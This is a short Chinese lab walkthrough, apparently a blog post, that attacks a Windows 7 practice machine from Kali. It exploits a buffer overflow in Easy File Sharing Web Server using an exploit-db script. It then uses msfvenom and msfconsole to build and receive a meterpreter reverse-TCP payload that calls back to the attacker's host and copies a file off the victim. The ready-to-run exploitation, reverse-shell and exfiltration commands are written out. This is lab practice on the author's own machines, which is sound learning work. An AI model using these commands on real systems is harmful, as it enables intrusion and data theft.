实验环境:
????????????????win7靶机,kali
首先在win7的靶机上配置好Easy File Sharing Web Server,打开之后如下图
直接点击Try it!进去之后点击start开始运行
接着到kali上使用nmap进行扫描,发现ip为192.168.23.130的主机存活
接着使用nmap -sV 192.168.23.132对靶机进行扫描(这里是132的原因是我重启了一下靶机ip地址发生了改变),此时发现80端口的服务版本是Easy File Sharing Web Server
接着使用searchsploit easy file sharing命令查找该服务中的渗透模块
这里使用的是HEAD Request Buffer Overflow漏洞(缓冲区溢出漏洞),查看该漏洞的路径,使用python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 目标ip 80进行攻击
接着回到靶机,发现计算器被打开了,并且Easy File Sharing Web Server停止工作,复现完毕。
在kali中输入命令msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.23.128 lport=5000 -f exe -o /home/kali/Desktop/payload.exe,在kali本地桌面生成一个payload,
接着将payload放到靶机上
接着使用msfconsole打开metasploit控制端,设置参数
set payload windows/meterpreter/reverse_tcp
set lhost 攻击者的ip
set lport 5000
exploit
靶机双击payload文件后,就可以在metasploit上使用命令
尝试将桌面上1.txt的文件下载下来
可以看到文件已经被下到kali中了